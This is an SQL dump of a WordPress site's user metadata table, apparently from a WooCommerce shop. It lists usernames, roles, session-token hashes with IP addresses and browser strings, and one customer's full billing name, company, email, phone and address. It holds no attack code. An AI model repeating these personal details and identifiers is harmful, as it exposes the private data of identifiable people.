INSERT INTO `wp_usermeta` VALUES (16682, 1104, 'session_tokens', 'a:1:{s:64:"084d41e88f43baf91541084a9524d453552a0bba1ce2ca3be8734f4132c8e8fd";a:4:{s:10:"expiration";i:1496751544;s:2:"ip";s:14:"173.44.100.195";s:2:"ua";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1495541944;}}'); 
INSERT INTO `wp_usermeta` VALUES (16683, 1105, 'nickname', 'emmanuel.a.franklin'); 
INSERT INTO `wp_usermeta` VALUES (16684, 1105, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16685, 1105, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16686, 1105, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16687, 1105, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16688, 1105, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16689, 1105, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16690, 1105, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16691, 1105, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16692, 1105, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16693, 1105, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16694, 1105, '_yoast_wpseo_profile_updated', '1495548154'); 
INSERT INTO `wp_usermeta` VALUES (16695, 1105, 'session_tokens', 'a:1:{s:64:"367f03421e8a17f5cb2a35758057c44d3aba49683b96207d2fa07e043b7963cc";a:4:{s:10:"expiration";i:1496757770;s:2:"ip";s:15:"139.169.239.197";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1495548170;}}'); 
INSERT INTO `wp_usermeta` VALUES (16696, 1106, 'nickname', 'sassysheila901959'); 
INSERT INTO `wp_usermeta` VALUES (16697, 1106, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16698, 1106, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16699, 1106, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16700, 1106, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16701, 1106, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16702, 1106, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16703, 1106, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16704, 1106, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16705, 1106, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16706, 1106, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16707, 1106, '_yoast_wpseo_profile_updated', '1495549732'); 
INSERT INTO `wp_usermeta` VALUES (16708, 1106, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16709, 1107, 'nickname', 'emma_burchett1989'); 
INSERT INTO `wp_usermeta` VALUES (16710, 1107, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16711, 1107, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16712, 1107, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16713, 1107, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16714, 1107, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16715, 1107, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16716, 1107, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16717, 1107, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16718, 1107, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16719, 1107, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16720, 1107, '_yoast_wpseo_profile_updated', '1495562501'); 
INSERT INTO `wp_usermeta` VALUES (16721, 1107, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16722, 1108, 'nickname', 'grn1001992'); 
INSERT INTO `wp_usermeta` VALUES (16723, 1108, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16724, 1108, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16725, 1108, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16726, 1108, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16727, 1108, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16728, 1108, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16729, 1108, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16730, 1108, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16731, 1108, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16732, 1108, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16733, 1108, '_yoast_wpseo_profile_updated', '1495575045'); 
INSERT INTO `wp_usermeta` VALUES (16734, 1108, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16735, 1109, 'nickname', 'kevin.pan'); 
INSERT INTO `wp_usermeta` VALUES (16736, 1109, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16737, 1109, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16738, 1109, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16739, 1109, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16740, 1109, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16741, 1109, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16742, 1109, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16743, 1109, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16744, 1109, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16745, 1109, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16746, 1109, '_yoast_wpseo_profile_updated', '1495577511'); 
INSERT INTO `wp_usermeta` VALUES (16748, 1109, 'session_tokens', 'a:1:{s:64:"4437dc050dbda2114bfb296ce2e3be9ffc7f9c217858d4c8da71905c33b54093";a:4:{s:10:"expiration";i:1502400284;s:2:"ip";s:13:"64.60.197.211";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36";s:5:"login";i:1502227484;}}'); 
INSERT INTO `wp_usermeta` VALUES (16749, 1110, 'nickname', 'andrew.dalton'); 
INSERT INTO `wp_usermeta` VALUES (16750, 1110, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16751, 1110, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16752, 1110, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16753, 1110, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16754, 1110, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16755, 1110, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16756, 1110, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16757, 1110, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16758, 1110, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16759, 1110, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16760, 1110, '_yoast_wpseo_profile_updated', '1495592945'); 
INSERT INTO `wp_usermeta` VALUES (16761, 1110, 'session_tokens', 'a:1:{s:64:"d9744adcb0f23bb5d7907b2ba5bca4770323f7f3b5d1303e35a59a7c987a6d58";a:4:{s:10:"expiration";i:1496802553;s:2:"ip";s:10:"108.7.97.5";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1495592953;}}'); 
INSERT INTO `wp_usermeta` VALUES (16762, 1111, 'nickname', 'stexada1960'); 
INSERT INTO `wp_usermeta` VALUES (16763, 1111, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16764, 1111, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16765, 1111, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16766, 1111, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16767, 1111, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16768, 1111, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16769, 1111, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16770, 1111, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16771, 1111, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16772, 1111, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16773, 1111, '_yoast_wpseo_profile_updated', '1495614829'); 
INSERT INTO `wp_usermeta` VALUES (16774, 1111, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16775, 1112, 'nickname', 'bae9622007'); 
INSERT INTO `wp_usermeta` VALUES (16776, 1112, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16777, 1112, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16778, 1112, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16779, 1112, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16780, 1112, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16781, 1112, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16782, 1112, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16783, 1112, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16784, 1112, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16785, 1112, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16786, 1112, '_yoast_wpseo_profile_updated', '1495616317'); 
INSERT INTO `wp_usermeta` VALUES (16787, 1112, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16790, 1113, 'nickname', 'kenneth.r.monroe'); 
INSERT INTO `wp_usermeta` VALUES (16791, 1113, 'first_name', 'Kenneth'); 
INSERT INTO `wp_usermeta` VALUES (16792, 1113, 'last_name', 'Monroe'); 
INSERT INTO `wp_usermeta` VALUES (16793, 1113, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16794, 1113, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16795, 1113, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16796, 1113, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16797, 1113, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16798, 1113, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16799, 1113, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16800, 1113, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16801, 1113, '_yoast_wpseo_profile_updated', '1495643607'); 
INSERT INTO `wp_usermeta` VALUES (16802, 1113, 'session_tokens', 'a:1:{s:64:"09f7b93578b770465a57904aa5e9975fbe666dec5b03c245217d9fa4fcf13818";a:4:{s:10:"expiration";i:1496853215;s:2:"ip";s:12:"192.35.35.35";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1495643615;}}'); 
INSERT INTO `wp_usermeta` VALUES (16803, 1113, 'last_update', '1495643752'); 
INSERT INTO `wp_usermeta` VALUES (16804, 1113, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (16805, 1114, 'nickname', 'm3bjones1969'); 
INSERT INTO `wp_usermeta` VALUES (16806, 1114, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16807, 1114, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16808, 1114, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16809, 1114, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16810, 1114, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16811, 1114, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16812, 1114, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16813, 1114, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16814, 1114, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16815, 1114, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16816, 1114, '_yoast_wpseo_profile_updated', '1495648779'); 
INSERT INTO `wp_usermeta` VALUES (16817, 1114, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16818, 1115, 'nickname', 'info6'); 
INSERT INTO `wp_usermeta` VALUES (16819, 1115, 'first_name', 'Chris'); 
INSERT INTO `wp_usermeta` VALUES (16820, 1115, 'last_name', 'Bayless'); 
INSERT INTO `wp_usermeta` VALUES (16821, 1115, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16822, 1115, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16823, 1115, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16824, 1115, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16825, 1115, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16826, 1115, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16827, 1115, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16828, 1115, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16829, 1115, '_yoast_wpseo_profile_updated', '1495651182'); 
INSERT INTO `wp_usermeta` VALUES (16830, 1115, 'session_tokens', 'a:1:{s:64:"a88cc9667373f4c88b1c203a03b4d645c03ea1f19a271a3bd62aed74d7d49712";a:4:{s:10:"expiration";i:1496860790;s:2:"ip";s:13:"199.68.204.13";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1495651190;}}'); 
INSERT INTO `wp_usermeta` VALUES (16831, 1115, 'billing_first_name', 'Chris'); 
INSERT INTO `wp_usermeta` VALUES (16832, 1115, 'billing_last_name', 'Bayless'); 
INSERT INTO `wp_usermeta` VALUES (16833, 1115, 'billing_company', 'GPI Pro Systems.com'); 
INSERT INTO `wp_usermeta` VALUES (16834, 1115, 'billing_email', 'info@gpiprosystems.com'); 
INSERT INTO `wp_usermeta` VALUES (16835, 1115, 'billing_phone', '541-389-5485'); 
INSERT INTO `wp_usermeta` VALUES (16836, 1115, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (16837, 1115, 'billing_address_1', '61935 Ten Barr Ranch Rd,'); 
INSERT INTO `wp_usermeta` VALUES (16838, 1115, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (16839, 1115, 'billing_city', 'Bend'); 
INSERT INTO `wp_usermeta` VALUES (16840, 1115, 'billing_state', 'OR'); 
INSERT INTO `wp_usermeta` VALUES (16841, 1115, 'billing_postcode', '97701'); 
INSERT INTO `wp_usermeta` VALUES (16842, 1115, 'last_update', '1495651462'); 
INSERT INTO `wp_usermeta` VALUES (16843, 1116, 'nickname', 'gladdrags1961'); 
INSERT INTO `wp_usermeta` VALUES (16844, 1116, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16845, 1116, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16846, 1116, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16847, 1116, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16848, 1116, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16849, 1116, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16850, 1116, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16851, 1116, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16852, 1116, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16853, 1116, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16854, 1116, '_yoast_wpseo_profile_updated', '1495654278'); 
INSERT INTO `wp_usermeta` VALUES (16855, 1116, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16856, 1117, 'nickname', 's.maldonado.s1953'); 
INSERT INTO `wp_usermeta` VALUES (16857, 1117, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16858, 1117, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16859, 1117, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16860, 1117, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16861, 1117, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16862, 1117, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16863, 1117, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16864, 1117, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16865, 1117, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16866, 1117, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16867, 1117, '_yoast_wpseo_profile_updated', '1495684003'); 
INSERT INTO `wp_usermeta` VALUES (16868, 1117, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16869, 1118, 'nickname', 'rachellegbrettler1966'); 
INSERT INTO `wp_usermeta` VALUES (16870, 1118, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16871, 1118, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16872, 1118, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16873, 1118, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16874, 1118, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16875, 1118, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16876, 1118, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16877, 1118, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16878, 1118, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16879, 1118, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16880, 1118, '_yoast_wpseo_profile_updated', '1495707241'); 
INSERT INTO `wp_usermeta` VALUES (16881, 1118, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16882, 1119, 'nickname', 'denahazel1973'); 
INSERT INTO `wp_usermeta` VALUES (16883, 1119, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16884, 1119, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16885, 1119, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16886, 1119, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16887, 1119, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16888, 1119, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16889, 1119, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16890, 1119, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16891, 1119, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16892, 1119, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16893, 1119, '_yoast_wpseo_profile_updated', '1495707839'); 
INSERT INTO `wp_usermeta` VALUES (16894, 1119, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16895, 1120, 'nickname', 'gmsavona'); 
INSERT INTO `wp_usermeta` VALUES (16896, 1120, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16897, 1120, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16898, 1120, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16899, 1120, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16900, 1120, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16901, 1120, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16902, 1120, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16903, 1120, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16904, 1120, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16905, 1120, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16906, 1120, '_yoast_wpseo_profile_updated', '1495720426'); 
INSERT INTO `wp_usermeta` VALUES (16907, 1120, 'session_tokens', 'a:1:{s:64:"58cfe5b694db9b0919cc5501a679bfd579066e807245ae22aacb47fb7edc74b8";a:4:{s:10:"expiration";i:1496930040;s:2:"ip";s:12:"70.89.58.250";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1495720440;}}'); 
INSERT INTO `wp_usermeta` VALUES (16908, 1121, 'nickname', 'lmalam'); 
INSERT INTO `wp_usermeta` VALUES (16909, 1121, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16910, 1121, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16911, 1121, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16912, 1121, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16913, 1121, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16914, 1121, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16915, 1121, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16916, 1121, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16917, 1121, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16918, 1121, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16919, 1121, '_yoast_wpseo_profile_updated', '1495725754'); 
INSERT INTO `wp_usermeta` VALUES (16920, 1121, 'session_tokens', 'a:1:{s:64:"ebc4b9921968bbeb13e6ce2ad7021ca37da74aac4c945d34665e359500913e1e";a:4:{s:10:"expiration";i:1496935364;s:2:"ip";s:12:"198.41.93.34";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0";s:5:"login";i:1495725764;}}'); 
INSERT INTO `wp_usermeta` VALUES (16921, 1122, 'nickname', 'mjcarr'); 
INSERT INTO `wp_usermeta` VALUES (16922, 1122, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16923, 1122, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16924, 1122, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16925, 1122, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16926, 1122, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16927, 1122, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16928, 1122, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16929, 1122, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16930, 1122, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16931, 1122, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16932, 1122, '_yoast_wpseo_profile_updated', '1495725919'); 
INSERT INTO `wp_usermeta` VALUES (16933, 1122, 'session_tokens', 'a:1:{s:64:"fa88fe4f513c7d7598e973011ed6b79c8a141d78477354c33cfda0a1faa8e896";a:4:{s:10:"expiration";i:1496935528;s:2:"ip";s:13:"12.202.108.74";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";s:5:"login";i:1495725928;}}'); 
INSERT INTO `wp_usermeta` VALUES (16934, 1123, 'nickname', 'john.farrell'); 
INSERT INTO `wp_usermeta` VALUES (16935, 1123, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16936, 1123, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16937, 1123, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16938, 1123, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16939, 1123, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16940, 1123, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16941, 1123, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16942, 1123, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16943, 1123, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16944, 1123, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16945, 1123, '_yoast_wpseo_profile_updated', '1495743215'); 
INSERT INTO `wp_usermeta` VALUES (16946, 1123, 'session_tokens', 'a:2:{s:64:"0ac540366550670542694a0aa986534185b57442bc52acd0a894e8a471a3bcd3";a:4:{s:10:"expiration";i:1496952823;s:2:"ip";s:12:"88.87.190.60";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";s:5:"login";i:1495743223;}s:64:"afcae8134f5b79f514a0b32faffbb2417c29cbcffa643b66a53dabf7164fdf2f";a:4:{s:10:"expiration";i:1495954658;s:2:"ip";s:14:"165.225.16.202";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1495781858;}}'); 
INSERT INTO `wp_usermeta` VALUES (16947, 1124, 'nickname', 'bvbbritter1984'); 
INSERT INTO `wp_usermeta` VALUES (16948, 1124, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16949, 1124, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16950, 1124, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16951, 1124, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16952, 1124, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16953, 1124, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16954, 1124, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16955, 1124, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16956, 1124, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16957, 1124, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16958, 1124, '_yoast_wpseo_profile_updated', '1495745721'); 
INSERT INTO `wp_usermeta` VALUES (16959, 1124, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (16960, 1125, 'nickname', 'higgie32001'); 
INSERT INTO `wp_usermeta` VALUES (16961, 1125, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16962, 1125, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16963, 1125, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16964, 1125, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16965, 1125, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16966, 1125, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16967, 1125, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16968, 1125, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16969, 1125, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16970, 1125, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16971, 1125, '_yoast_wpseo_profile_updated', '1495747516'); 
